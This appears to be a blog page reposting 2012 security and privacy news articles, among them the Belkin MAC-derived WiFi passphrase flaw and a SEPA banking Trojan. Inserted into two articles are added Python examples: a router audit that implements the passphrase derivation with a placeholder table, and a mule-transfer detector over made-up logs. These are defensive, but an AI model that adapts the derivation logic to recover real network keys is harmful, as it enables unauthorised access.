STE WILLIAMS

ICO: Anonymised data doesn’t HAVE to guarantee your privacy

Data anonymisation does not have to provide a 100 per cent guarantee to individuals’ privacy in order for it to be lawful for organisations to disclose the information, the UK’s data protection watchdog has said.

The view of the Information Commissioner’s Office (ICO), detailed in a new code of practice (108-page/2.15MB PDF) on anonymisation it has published, is that organisations that anonymise personal data can disclose that information even if there is a “remote” chance that the data can be matched with other information and lead to individuals being identified.

The ICO said that organisations that take action to mitigate the risk of anonymised data being used to identify individuals will be considered to have complied with the Data Protection Act (DPA) even if that action cannot eradicate the threat of the data being used to identify someone. The Act “does not require anonymisation to be completely risk free,” it added.

The data protection authority in Hamburg, known for its strong stance on privacy issues, told Out-Law.com that it too acknowledged that the “re-identification” of individuals, achieved from matching anonymised data with other information in the public domain or held by others, was impossible to prevent in all cases.

“Our general stance towards anonymisation is not far off of that of our British colleagues,” a spokesman for the Hamburg authority said. “German privacy law defines ‘rendering anonymous’ as ‘the alteration of personal data so that information concerning personal or material circumstances cannot be attributed to an identified or identifiable natural person or that such attribution would require a disproportionate amount of time, expense and effort’. It is therefore acknowledged that the absolute impossibility for re-identification in practice cannot always be achieved. Obviously this is addressed by the ICO in terms of a ‘remote risk’ remaining.”

Data protection law specialist Marc Dautlich of Pinsent Masons said that “The code is a very important one and has been published at a time when the Government is increasingly seeking to liberalise public sector-held datasets for research purposes, and when the private sector is increasingly exploiting data mining techniques for commercial purposes.”

In a statement the watchdog announced that a new “consortium” involving the University of Manchester, the University of Southampton, the Office for National Statistics and the government’s new Open Data Institute (ODI), would set up a new UK Anonymisation Network (UKAN). The Network will “enable sharing of good practice related to anonymisation, across the public and private sector” with information provided on a website, in case studies, clinics and seminars.

“What practical impact the new UK Anonymisation Network will have remains to be seen, but it could be a potentially valuable resource for organisations seeking guidance on their own anonymisation schemes,” Dautlich added.

Under its code, the ICO said that it was not always possible for personal data to be anonymised. It said that it was therefore “paramount” that data which could not be anonymised was kept secure. It said, though, that it is generally “easier” to disclose anonymised data than it is to disclose personal data because “fewer legal restrictions will apply”.

“There is clear legal authority for the view that where an organisation converts personal data into an anonymised form and discloses it, this will not amount to a disclosure of personal data,” the ICO said. “This is the case even though the organisation disclosing the data still holds the other data that would allow re-identification to take place.”

The ICO said that it can be difficult for organisations to know whether data they have anonymised can still be classed as ‘personal data’. It said, though, that a High Court ruling had made clear that “the risk of identification must be greater than remote and reasonably likely for information to be classed as personal data under the DPA”.

In “borderline” cases, organisations will have to assess the individual “circumstances of the case” to determine whether there is too great a risk that disclosing anonymised data would lead to individuals being identified, the ICO said.

“In borderline cases where the consequences of re-identification could be significant eg, because they would leave an individual open to damage, distress or financial loss, organisations should: seek data subject consent for the disclosure of the data, explaining its possible consequences; adopt a more rigorous form of risk analysis and anonymisation,” the ICO said. “In some scenarios, data should only be disclosed within a properly constituted closed community and with specific safeguards in place. In some particularly high-risk situations, it may not even be possible to share within a closed community.”

In cases where the risk of data matching is high, organisations can reduce that risk by only disclosing “parts of databases” in order to make “direct linkage more difficult”.

Under freedom of information (FOI) laws, organisations asked to disclose anonymised data will have to consider whether a “particular member of the public” has additional information that “could allow data to be combined to produce information that relates to and identifies a particular individual – and that is therefore personal data,” the watchdog added.

The ICO said that organisations will generally not require the consent of individuals to disclose anonymised data, but warned that it may not always be appropriate to disclose such information if there is a risk that an “educated guess” can be made as to the identity of the person whose data is anonymised where that “leads to the misidentification of an individual”.

The watchdog laid out a number of different safeguards that organisations should put in place in order to limit the access of people to anonymised datasets. It added that organisations anonymising personal information “need an effective and comprehensive governance structure” and that they should carry out “re-identification testing … to detect and deal with re-identification vulnerabilities”.

The ICO said that organisations that adhere to its recommendations should have a “reasonable degree of confidence” that their “publication of anonymised data will not lead to an inappropriate disclosure of personal data – through ‘re-identification’”.

Technology law specialist Luke Scanlon of Pinsent Masons, the law firm behind Out-Law.com, said that the watchdogs’ stance on anonymisation was “practical” but questioned whether it was consistent with wording in the EU’s Data Protection Directive.

A recital of the EU’s Data Protection Directive states that the “principles of protection must apply to any information concerning an identified or identifiable person” and that to “determine whether a person is identifiable, account should be taken of all the means likely reasonably to be used either by the controller or by any other person to identify the said person”.

However, the recital also states that “the principles of protection shall not apply to data rendered anonymous in such a way that the data subject is no longer identifiable”. It further adds that “codes of conduct … may be a useful instrument for providing guidance as to the ways in which data may be rendered anonymous and retained in a form in which identification of the data subject is no longer possible”.

“The recital appears to place the non-identifiability of the individual in absolute terms,” Scanlon said. “There is no indication in the recital which indicates that the principles of protection would not apply if an individual is only no longer ‘reasonably’ identifiable or in circumstances where there is a remote risk of identifiability.”

“Organisations therefore should remain cautious when using anonymised data, particularly if the use of such data would be in European jurisdictions other than the UK, wherever a conclusion can be drawn that there is a remote risk of identifiability,” he said.

The privacy watchdog for the German region of Schleswig-Holstein – the Independent Centre for Privacy Protection (ICPP) – which has been vocal on a number of data protection issues, told Out-Law.com that it was its view that both present and future risks must be taken into account when assessing the decision to disclose anonymised data.

“The [German] legal commentary argues that in some cases (similar to the ICO) 100 per cent anonymity is not possible to achieve, but that the risk has to be minimal,” Marit Hansen, deputy Privacy Information Commissioner in Schleswig-Holstein said.

“Further, the legal commentary demands that the available knowledge (whether lawfully available or not) has to be taken into account for assessing the possible risks of re-identification. It also stresses that the assessment result may change over time, eg, if new methods become available to link information,” she said.

“This may influence the way how to treat anonymised data: If you publish data on the internet that have been anonymised and are sufficiently protected against re-identification at one point in time, a later assessment may reveal that the protection may not be regarded adequate anymore. But then harm may already be done, and it would not be sufficient to delete the data (copies may be available, the re-identification may have been conducted already). This means that in our point of view anonymisation does not only mean to assess the risk once, but also to think of future risks, act accordingly (eg, to refrain from publishing these data on the internet) and assess the risk again if the conditions may have changed,” Hansen said.

Copyright © 2012, Out-Law.com

Out-Law.com is part of international law firm Pinsent Masons.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/26/anonymising_data_does_not_guarantee_privacy/

Mystery Chrome 0-day exploit to be unveiled in India on Saturday

A Georgian security researcher is due to present details of an unpatched vulnerability in Google’s Chrome browser at the Malcon security conference in India over the weekend.

Years ago the circumstances of Ucha Gobejishvili’s presentation would hardly have raised an eyebrow, but that was before Google began offering up to $60,000 in bug bounties for the low-down on the most serious, remotely exploitable bugs in its Chrome web browser software.

Gobejishvili has apparently forgone potential financial rewards by leaving Google in the dark before unwrapping a remotely exploitable hole in the Chrome web browser, which reportedly involves a critical vulnerability in a Chrome DLL. More details are due to emerge at a presentation by Gobejishvili at the International Malware Conference (MalCon) in New Delhi on Saturday (24 November).

Conference notes say that the presentation, entitled Project Calypso, Art of Infection, will cover browser exploitation methodologies and focus on the aforementioned Chrome zero-day vulnerability.

Ucha Gobejishvili, 19, is described as a system administrator at a small firm who is active as a penetration tester and vulnerability researcher. Files on Packet Storm suggest that Gobejishvili has carried out research on a Firefox 13.0 remote denial of service exploit, and he has also been linked with the discovery of a cross-site scripting flaw on Skype’s webstore earlier this year.

Gobejishvili told Security Ledger that he had no plans to release proof of concept code for the Chrome exploit on Windows systems he claims to have discovered. He says he’s holding off on publishing details because the issue is dangerous, though paradoxically he doesn’t seem to be working with Google in helping to develop a fix. He doesn’t appear to be working with exploit brokers either. Gobejishvili’s general reticence is shrouded in some mystery.

Google is aware of Gobejishvili’s claims, although it apparently hasn’t been in touch with him directly. Pending more details, Google (much like any other interested party) is only able to monitor the situation and await further developments. We’re awaiting word from the internet giant’s Indian arm and will update this story as and when we hear more.

Malcon promises to be an interesting conference all round, with teenage security research prodigies playing a central role in more ways than one. Gobejishvili will share the stage with Shantanu Gawde, 16, who is due to present a demo of the first Windows Mobile 8 malware. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/mystery_chrome_0_day/

UK student in dock over Anonymous £3.5m PayPal attack

The trial of a British university student accused of participating in attacks by hacktivist collective Anonymous against the websites of PayPal and others has begun in London.

Prosecutors say Christopher Weatherhead, 22, was studying at Northampton University when he allegedly took part in “Operation Payback”, the packet-flooding campaign against financial services firms that suspended payment processing of donations to WikiLeaks after the whistle-blowing site began publishing leaked US diplomatic cables in late 2010. Weatherhead denies one count of conspiracy to impair the operation of computers between 1 August 2010 and 27 January last year arising from the alleged computer hacking attacks.

A jury at Southwark Crown Court were told Ashley Rhodes, 27, from Camberwell, south London; Peter Gibson, 24, from Hartlepool; and an 18-year-old male had already pleaded guilty to the charge, the BBC reports.

Sandip Patel, prosecuting, said that attacks by Anonymous hackers had cost PayPal £3.5m ($5.5m) and forced it to draft in 100 staff from parent firm eBay in order to keep its website up and running during a series of sustained attacks over several weeks. The payment-processing firm was also obliged to buy additional hardware and services in the aftermath of the attacks. These DDoS assaults were launched using the Low Orbit Ion Cannon (LOIC) packet-flooding tool favoured by Anonymous at the time, The Guardian adds.

Patel said the Operation Payback attacks started out targeting firms known to oppose copyright piracy (such as Ministry of Sound nightclub, the British Recorded Music Industry and the International Federation of the Phonographic Industry) before switching targets to concentrate DDoS assaults on payment processing firms such as PayPal and MasterCard – which had pulled the plug on WikiLeaks, The Daily Telegraph reports.

Weatherhead, who allegedly used the online handle Nerdo, was alleged to have been among a small group of leaders on an IRC channel (AnonOps) used by Anonymous that selected targets, according to the prosecution.

“It is the prosecution case that Christopher Weatherhead, the defendant, is a cyber-attacker and that he, and others like him, waged a sophisticated and orchestrated campaign of online attacks that paralysed a series of targeted computer systems belonging to companies to which they took issue with, for whatever reason, and those attacks caused unprecedented harm,” Patel added, the BBC reports.

He claimed Anonymous was a group that represents the “dark side” of the internet, who “split into organised and co-ordinated attacks almost along military lines”.

Weatherhead was described in court as the network administrator for the AnonOps group. The prosecution alleged he had set up and run the website for the group under the false name Moses Gustavsson. Patel alleged that the defendant had contracted services from a Russian ISP called Heihachi – which the prosecutor described as a “safe haven” for cybercrime.

The defendant allegedly discussed plans to attack the Bank of America and GM Legal, a law firm involved in anti-piracy work, before his home was raided and equipment seized in January 2011.

The trial continues. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/anon_ddos_trial_oppayback/

Google Adwords scammer charged premium to call NHS Direct

Premium-rate call regulator PhonePayPlus has fined Red Play Media £50,000 for using Adword adverts to trick surfers into using premium-rate numbers to call non-premium services.

Red Play Media bought up Adwords, and Bing equivalents, to place links alongside searches for “NHS Direct” or similar. Clicking on the advert brings up a nice big phone number which, if dialled, will cost the caller £1.53 a minute as it offers to read out the real phone number or put the caller through (at the £1.53-a-minute rate), which was enough to garner 15 complaints and trigger the fine.

All companies using premium-rate phone lines are required to register with PhonePayPlus, which regulates their behaviour and investigates complaints, though not always as quickly as one might hope. The sites being run by Red Play Media – callerhelp.co.uk and phonenumber.co.uk – had been garnering complaints since December last year, with The Guardian reporting on the scam, and naming the companies, back in March.

And the practice is still endemic – type “tax office number” into Google and you’ll get two ads for fastphonenumbers.co.uk and easyphonenumbers.co.uk, both of which belong to Square1 Communications Limited and rely on the small print to keep them legitimate:

[Image: Entirely legitimate service example. Caption: An entirely legitimate service for those who don’t want to call 0845 300 0627]

Wayback Machine archives for the Red Play Media websites indicate the company wasn’t always so assiduous about mentioning its rates, and the fact that it wasn’t affiliated with the service being called, but any service generating customer complaints can trigger a PhonePayPlus investigation.

Red Play Media was not the only firm doing this, but unlike the rules-abiding Square1, which only targeted those seeking tax advice, Red Play Media bought Adwords for “NHS Direct” and various hospitals – which meant it was deliberately targeting vulnerable groups who might not be thinking entirely clearly while Googling for emergency aid, also against the PhonePayPlus rules.

So thanks to PhonePayPlus, those searching for a hospital – or Wonga.com (which Red Play Media also bought) – will be safe until the next buyer steps up, but those looking to call their local tax office should still dial with care. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/adwords_scam/

Exploit broker releases EXPLICIT VIDS of holes in industrial control kit

Malta-based security start-up ReVuln claims to have uncovered a raft of vulnerabilities in industrial control kit from many leading manufacturers.

ReVuln released a video depicting zero-day exploits against SCADA* equipment from Siemens, General Electric, Schneider Electric, ABB/Rockwell and others. The unpatched flaws are all server-side and remotely exploitable by hackers, according to ReVuln.

No technical details were provided, so the claims of unpatched security flaws can’t be independently verified. Rather than reporting the flaws to vendors, ReVuln is offering to sell details of its discoveries to potential customers, a spokesman for the firm told El Reg.

“We sell our 0-day vulnerabilities to our 0-day feed customers. Vendors who want to improve their security can request one of our consulting services.”

The most obvious customers for details on SCADA exploits, particularly in the wake of Stuxnet, are government agencies. ReVuln said it accepts “trusted customers from reputable countries only”.

Like others in the emerging field of exploit-brokering, ReVuln avoids simply reporting security bugs to vendors as part of a vulnerability disclosure process. It also has little interest in bug-bounty programs of the type pioneered by the likes of Google and Mozilla, which are now gaining wider acceptance among IT vendors and others, such as PayPal.

“We don’t work for free,” a ReVuln spokesman explained. “We had several personal experiences in the past where vendors didn’t even say thanks for reporting a issue, or they try to underpay your research with bug-bounty programs that are not worth reporting issues to them.”

ReVuln’s website states that the start-up specialises in “software and hardware assessment including vulnerability research for offensive and defensive security”, which would appear to put the firm in the same category as exploit intelligence services firms such as Vupen Security.

Vupen, which bills itself as a “leading provider of defensive offensive cyber security intelligence for government”, recently claimed it was sitting on a tasty Windows 8 exploit which it declined to share with Microsoft.

ReVuln said that instead of comparing it with Vupen, it makes more sense to compare it with firms that buy vulnerabilities and report them to the vendors.

“There are several other companies outsourcing vulnerability research and reporting issues to the vendors after selling weaponized exploits to their customers. Their business model works because most of the people selling vulnerabilities to such companies are not aware of the real market value of the information they are selling, so they accept to sell their work for a very little amount of money,” the spokesman told us.

“On our side, we don’t buy vulnerabilities and all our research is made by our internal team, moreover we do not disclose vulnerability information to vendors.”

Last week Russian developer Positive Technologies said 40 per cent of SCADA systems “available from the internet” were hackable. The claim came just weeks after the balloon went up about flaws in CoDeSys, a popular development environment for industrial control systems used by scores of manufacturers.

Kaspersky Lab, the Russian security firm that has been applauded for its research into Stuxnet and other SCADA nasties, recently announced it was developing an operating system designed to make industrial control systems less vulnerable to the sort of attacks ReVuln boasts it has discovered.

The volume of SCADA vulnerabilities being uncovered makes ReVuln’s claims, which would have been considered fanciful two years ago, more than credible – even though they remain unproven.

Game on

Last week ReVuln said it had discovered a remote code execution vulnerability in the CryEngine 3 game engine and a server-side bug in Call of Duty: Modern Warfare 3 that could be used to mount denial of service attacks against game servers.

ReVuln’s paper (PDF) on the Call of Duty bug explains the issue in some depth while a video of the game engine vulnerability is far less forthcoming, other than classifying the exploit as arising from a heap spray vulnerability.

“The security hole in CryENGINE 3 is an example of 0-day vulnerability affecting the server-side part of games using game engines,” a ReVuln spokesman explained. “Basically by exploiting such hole it’s possible to compromise remote servers, and get complete control over them. We also discovered a 0-day vulnerability in Call Of Duty: Modern Warfare 3, which can be exploited to take down all the online servers at once.

“Please note that we didn’t provide any public exploit or proof-of-concept code,” he added.

The start-up said its security research covers many different fields, positioning its interest in game security as far from a hobby or side-project.

“Games have a huge market, and there is interest from game companies in game security to improve their level of security,” ReVuln explained. ®

* SCADA systems are used to monitor and control industrial processes, infrastructure, and facility-based processes – such as those of the Iranian nuclear plant attacked in 2010.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/scada_vulns/

WWII HERO PIGEON crypto message STUMPS GCHQ boffins

Brit spook central GCHQ can’t decipher a coded message found on a pigeon that died trying to deliver the missive during WWII, and may have to turn to the public for help.

The remains of the bird, found by David Martin in his chimney in Surrey, had a secret message attached – 27 handwritten blocks of code.

The pigeon is reckoned to have flown from Nazi-occupied France, possibly during the D-Day invasions, in June of 1944, and codebreakers at the intelligence agency have been trying to figure out what its message says.

But the problem is that the code could be a one-off encryption, which only the sender and the recipient would have had a key for.

“We didn’t really hold out any hopes we would be able to read the message because the sort of codes that were constructed to be used during operations were designed only to be able to be read by the senders and the recipients,” GCHQ historian Tony, who asked that only his first name be used, told the BBC.

“Unless you get rather more idea than we have of who actually sent this message and who it was sent to, we are not going to find out what the underlying code being used was.”

The code could also have been based on a specific codebook put together for one mission that allowed the maximum information about that operation to be sent in the shortest possible message. If the codebook has since been destroyed, that would also make the encryption practically unbreakable.

Since the message is written on an official pad, historians don’t think it was sent by a spy – because a spook wouldn’t want to carry anything official around in case they were caught. In fact, the theory is that it was an Army unit’s message, since the abbreviation “Sjt W Stot” is in the message and the Army used that old-fashioned spelling of Serjeant.

Experts have also discounted the idea that the bird may have been on its way to the codebreaking offices at Bletchley Park, as this was a station for decoding German and Japanese messages, not somewhere the British military regularly sent communications.

GCHQ has been able to narrow it down a little by pigeon identification numbers. Each of the 250,000 or so birds used as messengers during the war was given an ID number, but this message contains two of these numbers and the agency is unsure which one relates to the pigeon found in the chimney.

Some help from the public could give GCHQ the contextual information it needs to help decode the message, such as the identity of Sjt Stot and clues to the identities of the sender and recipient.

“There are still quite a lot of people alive who worked in communications centres during the war and who might have some knowledge about this and it would be very interesting if anyone did have information if they could put it in the pot and we could see if we could get any further with it,” Tony said. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/pigeon_wwii_code_unbreakable/

Israeli deputy PM’s social media hacked by pro-Palestine group

Israel’s deputy prime minister Silvan Shalom has become the latest victim of the escalating cyber conflict between Israel and Palestine after his social media accounts were hacked and used to issue pro-Palestine propaganda.

Shalom’s Facebook, Twitter, YouTube, Blogger and LinkedIn accounts were hacked by a pro-Palestine group known as ZCompany Hacking Crew (ZHC), The Times of India reported.

The group is said to have posted videos on Shalom’s YouTube account depicting alleged Israeli atrocities against Palestine, while typical tweets included: “Get out of Palestine Israeli Zionists! Stop the attacks! End the slaughter of innocent people!!”

Although the social media accounts have now been reclaimed or taken offline, the hackers threatened to release private documents, contacts and even personal photos they claimed to have obtained by cracking Shalom’s Gmail and Picasa accounts.

The attacks are the latest in a continuing online theatre of conflict which sparked into life after Israeli forces launched Operation Pillar of Defense – pounding Gaza for over a week in what it claimed was a bid to target terror groups in the region that had been firing rockets at civilian targets within Israel.

Pro-Palestine hacktivists, including Anonymous, have sought to hit back, launching an estimated 100 million DDoS and web defacement attacks on Israeli web sites, according to Israeli newspaper Haaretz.

“In the first two days of the operation, we saw as many attempts to hack government websites as we usually see in a full month,” acting head of E-Government, Ofir Ben Avi, told the paper.

“The number of denial-of-service attacks is like nothing we’ve ever seen before.”

The Bank of Jerusalem’s online services were apparently taken out for a few hours, as was the Israel Defense Force’s blog, and hundreds of privately-owned Israeli web sites were defaced with pro-Hamas and Palestine messages.

However, for the most part Israel’s tech defences appear to have held firm, which one would expect from a country which allegedly had a hand in the development of the infamous Stuxnet and Flame malware.

Israel also had the upper hand in that Gaza’s internet and telecommunications networks run in and out of the country, giving Jerusalem the option of choking traffic in the region if it chooses to do so. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/israel_deputy_pm_social_media_hack_palestine/

Hexing MAC address reveals Wifi passwords

The default WPA2-PSK passphrase used in some Belkin routers simply replaces each character of the device’s MAC address with another hexadecimal character, according to security blogger Jakob Lell.

Lell describes the situation as follows:

Each of the eight characters of the default passphrase is created by substituting a corresponding hex digit of the WAN MAC address using a static substitution table. Since the WAN MAC address is the WLAN MAC address + one or two (depending on the model), a wireless attacker can easily guess the WAN MAC address of the device and thus calculate the default WPA2 passphrase.

In either case, that’s problematic because it is possible to interrogate WiFi routers in order to learn their MAC address. Some models even advertise the address on the case of the device!

Lell’s revelation, which he says makes it possible to deduce passwords by drawing up a simple substitution table, means all an attacker needs to do to compromise a device is learn its MAC address and then spend a few minutes converting it into Hex.

Lell’s post on the topic suggests Belkin’s Surf N150 Model F7D1301v1, N900 Model F9K1104v1 and N450 Model F9K1105V2 are all susceptible to the attack.

He also writes that other routers may have the same issue, with only the substitution table differing.

“It is likely that other Belkin devices are affected as well,” Lell’s post says, adding that he has tried to engage the company on the issue since January 2012, without success. “Unfortunately, Belkin has not yet cooperated with us to fix the vulnerability and/or confirm a list of other affected devices,” he says.

Comment has been sought from Belkin. Belkin’s online press rooms in the USA and UK are silent on the issue.

The good news is that users need only change the password to make the poorly-coded default codes irrelevant. And we all know users are always diligent about that kind of chore and would never leave a system in an insecure state. ®
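An inventory audit for the weakness described above, added here as an example and not code from Lell’s post or from Belkin: it rebuilds the candidate WAN MACs (WLAN MAC + 1 or + 2, with the carry across octets handled), applies a per-digit substitution to eight hex digits and flags any router whose passphrase in use still equals that derivable default. The substitution table is a constructed placeholder, since the real per-model table is not on the page, and the choice of the last eight hex digits as the substituted window is an assumption.

```python
# Added example, not from Lell's post or Belkin. Defender-side audit: flag
# routers whose WPA2 passphrase is still derivable from their MAC address.
# Assumptions (labelled): SUBSTITUTION_TABLE is a constructed placeholder,
# not the real table; WINDOW (last eight hex digits) is an assumption;
# WAN MAC = WLAN MAC + 1 or + 2 is what the post states.

HEX = "0123456789abcdef"

# Placeholder: a constructed permutation of the hex digits, NOT Belkin's table.
SUBSTITUTION_TABLE = dict(zip(HEX, "7f9a3c1e5b0d8642"))

WAN_OFFSETS = (1, 2)    # per Lell: WAN MAC is WLAN MAC + 1 or + 2, model dependent
WINDOW = slice(4, 12)   # assumption: the last eight of the twelve hex digits


def mac_to_int(mac: str) -> int:
    """Parse 'aa:bb:cc:dd:ee:ff' (':' or '-' separated, or bare) into a 48-bit int."""
    digits = mac.lower().replace(":", "").replace("-", "")
    if len(digits) != 12 or any(c not in HEX for c in digits):
        raise ValueError(f"not a MAC address: {mac!r}")
    return int(digits, 16)


def int_to_mac(value: int) -> str:
    """Format a 48-bit int as colon-separated lower-case hex, wrapping at 2^48."""
    value &= (1 << 48) - 1
    digits = f"{value:012x}"
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def candidate_wan_macs(wlan_mac: str, offsets=WAN_OFFSETS) -> list:
    """WAN MACs that follow from the WLAN MAC under the +1/+2 rule.
    Integer arithmetic carries across octets (...:44:ff -> ...:45:00)."""
    base = mac_to_int(wlan_mac)
    return [int_to_mac(base + off) for off in offsets]


def derived_passphrase(wan_mac: str, table=SUBSTITUTION_TABLE) -> str:
    """Apply the static per-digit substitution to the chosen window of the WAN MAC."""
    digits = wan_mac.lower().replace(":", "")[WINDOW]
    return "".join(table[d] for d in digits)


def derivable_from(wlan_mac: str, passphrase: str, table=SUBSTITUTION_TABLE):
    """Return the WAN MAC the passphrase derives from, or None if no candidate
    matches. Case-insensitive; a passphrase that is not 8 characters cannot match."""
    if len(passphrase) != 8:
        return None
    for wan in candidate_wan_macs(wlan_mac):
        if derived_passphrase(wan, table) == passphrase.lower():
            return wan
    return None


def audit(inventory: list) -> list:
    """inventory: [(label, wlan_mac, passphrase_in_use), ...].
    Returns the labels of devices still on the derivable default passphrase."""
    flagged = []
    for label, wlan_mac, passphrase in inventory:
        if derivable_from(wlan_mac, passphrase) is not None:
            flagged.append(label)
    return flagged


# Constructed sample inventory: 'c90d8622' is what the placeholder table yields
# for WAN MAC 94:44:52:ab:cd:ff, i.e. the first device's WLAN MAC + 1.
SAMPLE_INVENTORY = [
    ("branch-ap-1", "94:44:52:ab:cd:fe", "c90d8622"),
    ("branch-ap-2", "00:11:22:33:44:ff", "correct horse battery"),
]

if __name__ == "__main__":
    for label in audit(SAMPLE_INVENTORY):
        print(f"{label}: passphrase is the MAC-derived default, change it")
```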

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/wifi_passwords_deduced_from_mac_address/

Cyber blaggers autoplunder bulging accounts on Euro pay network

Cybercrooks have developed a Trojan that targets high-value accounts linked to the European SEPA payments network.

The highly targeted malware-based scam is an extension of the ongoing Operation High Roller, according to Intel’s McAfee security division. Fraudsters have siphoned off tens of thousands from SEPA-linked accounts after infecting the computers of only a few dozen or so targets with accounts at two German banks.

Openly accessible logs on a control server behind the scam allowed McAfee researchers to work out that €61,000 in fraudulent SEPA transactions had been run against accounts held at just one of these banks.

SEPA (Single Euro Payments Area) is a payment-integration initiative of the European Union that covers all 27 EU member states, three European Economic Area countries (Iceland, Liechtenstein and Norway) and Switzerland and Monaco. It is similar to the Automated Clearing House banking network in the United States.

Because SEPA makes no distinction between domestic and cross-border transfers within the area, the crooks only need money-mule accounts to use as dropboxes for the stolen funds, and they can automate the fraud to a degree that is not possible with ordinary online-banking attacks, as McAfee explains:

The latest attack targets the German banking industry with a targeted ATS [automated transfer system] designed with SEPA in mind. The malicious “webinjects” target two German banks with a specially crafted JavaScript payload deployed to about a dozen of their online banking customers that have SEPA as an option, keeping this attack very targeted in nature.

The targeted nature of such malware tends to remain undetected for a time. Thus, these campaigns are hard to discover because they infect only dozens of customers, rather than hundreds or more.

The transaction server used in this attack is hosted in Moscow and hosts a separate control panel for each of the targeted banks. Although the control panel isn’t sophisticated, the machinery that acts behind the scenes is complex.

The ZeuS-style banking malware at the heart of the attack injects itself into the browser process of compromised machines before attempting to initiate withdrawals of between €1,000 and the SEPA transaction maximum of €100,000. The malware hides security alerts and transaction records.
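What this pattern looks like from the bank's side, as an added example over constructed transfer logs: this is not McAfee's code and not their detection logic, which the article does not describe. The signals are assumptions chosen to match the description above: transfers in the EUR 1,000 to 100,000 band to a beneficiary IBAN that is new for the sending customer, and the same new IBAN collecting first-time payments from several customers of one bank within a short window, which is what a shared money-mule dropbox looks like in the transaction log.

```python
"""Flag the SEPA automated-transfer pattern over constructed transfer records.

Added example, not McAfee's code or detection rules. Signals are ASSUMPTIONS
for illustration: in-band amount, first-time payee, and one IBAN collecting
first-time payments from several customers in a short window (mule dropbox).
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

MIN_EUR, MAX_EUR = 1_000, 100_000  # transfer band quoted in the article


@dataclass(frozen=True)
class Transfer:
    ts: datetime
    customer: str
    beneficiary_iban: str
    amount_eur: float


def normalise_iban(iban: str) -> str:
    return iban.replace(" ", "").upper()


def iban_is_valid(iban: str) -> bool:
    """ISO 13616 mod-97 check. A webinject still has to submit a well-formed IBAN,
    so this only rejects garbage; it says nothing about whether the payee is a mule."""
    s = normalise_iban(iban)
    if not (15 <= len(s) <= 34) or not s[:2].isalpha() or not s.isalnum():
        return False
    rearranged = s[4:] + s[:4]                      # move country code + check digits to the end
    numeric = "".join(str(int(c, 36)) for c in rearranged)  # A=10 ... Z=35
    return int(numeric) % 97 == 1


def flag_mule_dropboxes(transfers, known_payees, window=timedelta(hours=24), min_customers=2):
    """Return {iban: sorted customers} for IBANs that received in-band, first-time
    transfers from at least `min_customers` distinct customers inside `window`.
    `known_payees` is the set of (customer, iban) pairs seen before this batch."""
    first_time = defaultdict(list)  # iban -> [(ts, customer)], in time order
    for t in sorted(transfers, key=lambda t: t.ts):
        iban = normalise_iban(t.beneficiary_iban)
        if (t.customer, iban) in known_payees or not MIN_EUR <= t.amount_eur <= MAX_EUR:
            continue
        if not iban_is_valid(iban):
            continue  # the bank would reject it anyway; not interesting here
        first_time[iban].append((t.ts, t.customer))

    flagged = {}
    for iban, events in first_time.items():
        for i, (start, _) in enumerate(events):
            customers = {c for ts, c in events[i:] if ts - start <= window}
            if len(customers) >= min_customers:
                flagged[iban] = sorted(customers)
                break
    return flagged


# Constructed sample data (not from the article). The IBANs are the standard
# published test examples for DE, GB and NL, not real accounts.
KNOWN_PAYEES = {("alice", "DE89370400440532013000")}
T0 = datetime(2012, 11, 20, 9, 0)
SAMPLE_TRANSFERS = [
    Transfer(T0, "alice", "GB82 WEST 1234 5698 7654 32", 4_500.00),                    # new payee, in band
    Transfer(T0 + timedelta(minutes=40), "bob", "GB82WEST12345698765432", 12_000.00),  # same new payee
    Transfer(T0 + timedelta(minutes=75), "carol", "NL91 ABNA 0417 1643 00", 3_000.00),  # new, one customer only
    Transfer(T0 + timedelta(hours=2), "alice", "DE89 3704 0044 0532 0130 00", 250.00),  # known payee, below band
    Transfer(T0 + timedelta(hours=3), "dave", "GB82WEST12345698765432", 500.00),        # below band, ignored
]


def demo(window_hours: float = 24) -> dict:
    return flag_mule_dropboxes(SAMPLE_TRANSFERS, KNOWN_PAYEES, window=timedelta(hours=window_hours))


if __name__ == "__main__":
    for iban, customers in demo().items():
        print(f"possible mule dropbox {iban}: first-time payments from {', '.join(customers)}")
```

The correlation across customers is the point: each transfer on its own is a legitimate-looking SEPA payment to a valid IBAN, and the infected machine hides the confirmation from the victim, so the bank's own ledger is the only place the shared dropbox shows up.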

These malware-based tricks are not new, and frauds against automated wire transactions have been seen before. The main significance of the latest attacks, as McAfee researchers point out, is that cybercrooks are beginning to target different types of payment channels, such as SEPA. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/sepa_trojan_scam/

eBay: It’s safe to buy busted lava lamps and bug-infested rugs again

eBay has resolved a cross-site scripting bug on its website that independent experts warned posed a significant risk of fraud to users of the auction site. The XSS flaw meant that, once logged into a seller account on eBay, an attacker could insert XSS exploit code into a listing of an item for sale.

The XSS security flaw on eBay.com, discovered by Indian security researcher Shubham Upadhyay last week, created a means for hackers to inject attack code as “user-submitted content” in product listings. According to XSSed, the script insertion vulnerability provided a means to fling browser exploits and other nasties at surfers who viewed booby-trapped auctions.

And an independent security expert reckoned the vulnerability might even have lent itself to tricking victims into placing bids on auction items without their consent.

In a statement issued today, an eBay spokeswoman confirmed that the bug had been quashed and outlined eBay’s general approach to automatically scanning for XSS-related vulnerabilities on the online marketplace.

We were aware of this case and the issue has already been dealt with.

eBay has a tool that scans for such XSS vulnerabilities in user generated content. As with any automated tool, false positives and negatives do occur. Once we determine the user has violated eBay policy, we immediately remove the item and suspend the user account.

Scanning for cross-site scripting nasties is just one of the “numerous security detection tools” eBay applies in its ongoing fight to ensure the safety and security of its marketplace, she added. eBay said around 60 million items are listed on its UK site alone at any one time, with more than 17 million people visiting the site each month.

Dominique Karg, chief hacking officer at security management tools firm AlienVault, described the vulnerability as presenting a “high threat” to eBay users before it was fixed.

“If this hadn’t been fixed I’d consider this a high threat, specially considering the type of site,” Karg explained.

